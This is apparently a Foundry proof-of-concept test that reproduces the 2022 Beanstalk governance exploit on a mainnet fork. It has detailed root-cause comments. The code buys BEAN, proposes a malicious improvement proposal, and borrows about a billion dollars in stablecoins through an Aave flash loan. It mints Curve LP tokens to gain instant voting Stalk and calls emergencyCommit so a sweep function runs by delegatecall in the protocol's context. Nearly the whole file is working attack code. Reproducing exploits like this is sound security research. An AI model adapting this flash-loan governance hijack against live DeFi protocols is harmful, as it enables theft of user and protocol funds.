// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;

import "forge-std/Test.sol";
import "./../interface.sol";

// VULNERABILITY: Governance Hijack via Flash-Loan Instant Stalk + Unrestricted Diamond Init Delegatecall
// Root Cause:
//   Beanstalk uses a Diamond proxy (EIP-2533) for its core logic at 0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5.
//   Governance is controlled by "Stalk" (and roots) which are credited INSTANTLY when a user calls
//   depositBeans() or deposit(token, amount) on the SiloV2Facet (lines 40, 106 in exploit).
//   There is no lockup, no vesting period, no minimum deposit time — Stalk is available for voting the same block.
//   A passed BIP (Beanstalk Improvement Proposal) is executed via:
//     beanstalkgov.emergencyCommit(bip)  --> internally invokes a diamondCut-like path with the BIP's
//     stored (diamondCut, _init, _calldata)  [see IBeanStalk.propose + AppStorage.Governance.diamondCuts]
//   When _diamondCut is empty (as here) and _init + _calldata are provided, the Diamond's fallback + LibDiamond.initializeDiamondCut
//   performs: _init.delegatecall(_calldata)  IN THE CONTEXT OF THE DIAMOND (so address(this)==Diamond, full storage+balances).
//   See:
//     - sources/Diamond_C1E088/contracts_farm_Diamond.sol:46 (fallback delegatecall to facets)
//     - sources/Diamond_C1E088/contracts_libraries_LibDiamond.sol:220 (_init.delegatecall(_calldata))
//     - DiamondCutFacet:28 (but governance bypasses owner-only diamondCut by using BIP path)
//     - AppStorage.sol:70 (Bip struct, Governance struct holding diamondCuts and bips)
//   The flash loan (Aave ~1B stables) + Curve 3pool + bean3Crv metapool (0x3a70DfA7...) is used solely to
//   manufacture a huge quantity of a "depositable" asset (the bean3crv LP token) that the Silo will accept,
//   minting enough Stalk to control the vote and pass the emergencyCommit threshold for BIP#18.
// Why it works:
//   1. Silo accounting (Account.State.s.stalk / roots) is updated synchronously on deposit (no time-weighted or locked component).
//   2. Propose() only needs a tiny amount of Stalk (seed 75 ETH->BEAN + depositBeans at L40).
//   3. emergencyCommit can be called by anyone once the BIP's Stalk support threshold is met (here achieved post-flash).
//   4. No sanity on _init (attacker contract) or restriction on what the delegatecall can do (arbitrary transfers of held assets).
//   5. Beanstalk Diamond itself custodied large external reserves (3CRV, stables, etc. from prior raises/ops) + all user deposits.
// Impact:
//   Direct theft of all protocol-controlled ERC20 balances (in live exploit ~$182M). Here the PoC sweep only
//   demonstrates reclaiming the flash-manufactured LP so the loan can be unwound profitably (net of Aave premium).
//   Any holder of Stalk can be diluted or governance can be used for further malicious state changes.
// References in PoC:
//   - propose at L48
//   - flash amounts at L70-76 (350M DAI + 500M USDC + 150M USDT)
//   - LP deposit at L106
//   - emergencyCommit at L110
//   - sweep delegatecall target at L140

contract ContractTest is Test {
    CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
    ILendingPool aavelendingPool = ILendingPool(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
    IERC20 dai = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    IERC20 bean = IERC20(0xDC59ac4FeFa32293A95889Dc396682858d52e5Db);
    IERC20 crvbean = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IERC20 threeCrv = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
    IUniswapV2Router uniswapv2 = IUniswapV2Router(payable(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D));
    ICurvePool threeCrvPool = ICurvePool(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
    ICurvePool bean3Crv_f = ICurvePool(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IBeanStalk siloV2Facet = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    IBeanStalk beanstalkgov = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    address maliciousProposal = 0xE5eCF73603D98A0128F05ed30506ac7A663dBb69;
    uint32 bip = 18;

    constructor() {
        cheat.createSelectFork("http://127.0.0.1:8545", 14_595_905); // fork mainnet at block 14595905
    }

    function testExploit() public {
        address[] memory path = new address[](2);
        path[0] = uniswapv2.WETH();
        path[1] = address(bean);
        uniswapv2.swapExactETHForTokens{value: 75 ether}(0, path, address(this), block.timestamp + 120);
        emit log_named_uint("Initial USDC balancer of attacker", usdc.balanceOf(address(this)));

        emit log_named_uint(
            "After initial ETH -> BEAN swap, Bean balance of attacker:", bean.balanceOf(address(this)) / 1e6
        );
        bean.approve(address(siloV2Facet), type(uint256).max);
        siloV2Facet.depositBeans(bean.balanceOf(address(this)));
        emit log_named_uint(
            "After BEAN deposit to SiloV2Facet, Bean balance of attacker:", bean.balanceOf(address(this)) / 1e6
        );
        // VULNERABILITY: Seed proposal with minimal Stalk (instant governance power)
        // depositBeans immediately increases attacker's Stalk balance (see AppStorage.a[addr].s.stalk + roots).
        // This Stalk is sufficient to call propose() even though it represents <<1% of total.
        IBeanStalk.FacetCut[] memory _diamondCut = new IBeanStalk.FacetCut[](0);
        bytes memory data = abi.encodeWithSelector(ContractTest.sweep.selector);
        //emit log_named_uint("BIP:", bip);
        // function propose(
        //     IDiamondCut.FacetCut[] calldata _diamondCut,
        //     address _init,
        //     bytes calldata _calldata,
        //     uint8 _pauseOrUnpause
        // )
        // https://dashboard.tenderly.co/tx/mainnet/0x68cdec0ac76454c3b0f7af0b8a3895db00adf6daaf3b50a99716858c4fa54c6f
        beanstalkgov.propose(_diamondCut, address(this), data, 3);
        // The propose records the malicious (empty cut, _init=this, calldata=sweep) into Storage.Governance.diamondCuts[bip] / bips[bip].

        cheat.warp(block.timestamp + 24 * 60 * 60); //travelling 1 day in the future

        dai.approve(address(aavelendingPool), type(uint256).max);
        usdc.approve(address(aavelendingPool), type(uint256).max);
        TransferHelper.safeApprove(address(usdt), address(aavelendingPool), type(uint256).max);
        bean.approve(address(aavelendingPool), type(uint256).max);
        dai.approve(address(threeCrvPool), type(uint256).max);
        usdc.approve(address(threeCrvPool), type(uint256).max);
        TransferHelper.safeApprove(address(usdt), address(threeCrvPool), type(uint256).max);
        bean.approve(address(siloV2Facet), type(uint256).max);
        threeCrv.approve(address(bean3Crv_f), type(uint256).max);
        IERC20(address(bean3Crv_f)).approve(address(siloV2Facet), type(uint256).max);

        // VULNERABILITY: Flash-loan + Curve LP mint to acquire temporary Stalk majority
        // By borrowing 1B stables, the attacker mints a massive position in the Bean:3Crv metapool LP.
        // This LP is an accepted silo deposit asset. The subsequent deposit() mints Stalk proportional to
        // the deposited value, dwarfing all honest Stalk and satisfying the threshold for emergencyCommit.
        address[] memory assets = new address[](3);
        assets[0] = address(dai);
        assets[1] = address(usdc);
        assets[2] = address(usdt);

        uint256[] memory amounts = new uint256[](3);
        amounts[0] = 350_000_000 * 10 ** dai.decimals();
        amounts[1] = 500_000_000 * 10 ** usdc.decimals();
        amounts[2] = 150_000_000 * 10 ** usdt.decimals();

        uint256[] memory modes = new uint256[](3);
        aavelendingPool.flashLoan(address(this), assets, amounts, modes, address(this), new bytes(0), 0);
        emit log_named_uint("After Flashloan repay, usdc balance of attacker:", usdc.balanceOf(address(this)));
        usdc.transfer(msg.sender, usdc.balanceOf(address(this)));
    }

    function executeOperation(
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata premiums,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        emit log_named_uint("After deposit, Bean balance of attacker:", bean.balanceOf(address(this)) / 1e6); // @note redundant log
        uint256[3] memory tempAmounts;
        tempAmounts[0] = amounts[0];
        tempAmounts[1] = amounts[1];
        tempAmounts[2] = amounts[2];
        threeCrvPool.add_liquidity(tempAmounts, 0);
        uint256[2] memory tempAmounts2;
        tempAmounts2[0] = 0;
        tempAmounts2[1] = threeCrv.balanceOf(address(this));
        bean3Crv_f.add_liquidity(tempAmounts2, 0);
        emit log_named_uint(
            "After adding 3crv liquidity , bean3Crv_f balance of attacker:", crvbean.balanceOf(address(this))
        );
        emit log_named_uint(
            "After Curvebean3Crv_f balance of attacker:", IERC20(address(bean3Crv_f)).balanceOf(address(this))
        ); //@note logging balance for same token ?
        // VULNERABILITY: Deposit of flash-manufactured LP grants instant controlling Stalk
        // siloV2Facet.deposit(token, amount) transfers the LP into the Diamond and synchronously
        // increases msg.sender's Stalk (and roots) in Account.State. No delay.
        // Because this happens inside the Aave flashLoan callback (before repay), the capital is temporary.
        siloV2Facet.deposit(address(bean3Crv_f), IERC20(address(bean3Crv_f)).balanceOf(address(this)));
        //beanstalkgov.vote(bip); --> this line not needed, as beanstalkgov.propose() already votes for our bip
        // VULNERABILITY: emergencyCommit executes attacker-chosen _init.delegatecall with protocol privileges
        // At this point attacker controls enough Stalk that the BIP passes the emergency path.
        // The governance facet reads the previously-proposed diamondCut/_init/_calldata and performs
        // the equivalent of diamondCut, resulting in delegatecall(sweep) while storage context = Diamond.
        beanstalkgov.emergencyCommit(bip);
        emit log_named_uint(
            "After calling beanstalkgov.emergencyCommit() , bean3Crv_f balance of attacker:",
            crvbean.balanceOf(address(this))
        );
        bean3Crv_f.remove_liquidity_one_coin(IERC20(address(bean3Crv_f)).balanceOf(address(this)), 1, 0);
        emit log_named_uint(
            "After removing liquidity from crvbean pool , bean3Crv_f balance of attacker:",
            crvbean.balanceOf(address(this))
        );
        tempAmounts[0] = amounts[0] + premiums[0];
        tempAmounts[1] = amounts[1] + premiums[1];
        tempAmounts[2] = amounts[2] + premiums[2];
        emit log_named_uint("premiums[0]:", premiums[0]);
        emit log_named_uint("premiums[1]:", premiums[1]);
        emit log_named_uint("premiums[2]:", premiums[2]);
        emit log_named_uint("tempAmounts[0]:", tempAmounts[0]);
        emit log_named_uint("tempAmounts[1]:", tempAmounts[1]);
        emit log_named_uint("tempAmounts[2]:", tempAmounts[2]);

        threeCrvPool.remove_liquidity_imbalance(tempAmounts, type(uint256).max);
        threeCrvPool.remove_liquidity_one_coin(threeCrv.balanceOf(address(this)), 1, 0);

        emit log_named_uint(
            "After removing 3crv liquidity from 3crv pool, usdc balance of attacker:", usdc.balanceOf(address(this))
        );

        return true;
    }

    function sweep() external {
        // VULNERABILITY: Arbitrary code execution payload executed via delegatecall in Diamond context
        // When emergencyCommit triggers the BIP's init, this runs as:
        //   (bool ok, ) = address(this /*Diamond*/).delegatecall( abi.encodeWithSelector(ContractTest.sweep.selector) );
        // Therefore IERC20.balanceOf(address(this)) reads the *Diamond's* balance of the LP token
        // (which received the attacker's flash deposit + any other protocol reserves of that token).
        // The transfer moves those tokens to msg.sender (the original caller of emergencyCommit, i.e. attacker).
        // In the real 2022-04 exploit the payload transferred every ERC20 held by the Diamond ( stables, BEAN, etc.).
        // This is possible because:
        //   - No access control inside sweep (anyone can call, but only reachable via gov path)
        //   - delegatecall gives msg.sender + storage of the proxy
        //   - No whitelist of allowed init addresses or calldata validation in the BIP execution path.
        IERC20 erc20bean3Crv_f = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
        erc20bean3Crv_f.transfer(msg.sender, erc20bean3Crv_f.balanceOf(address(this))); //Just for verification, so keep other tokens
    }
}
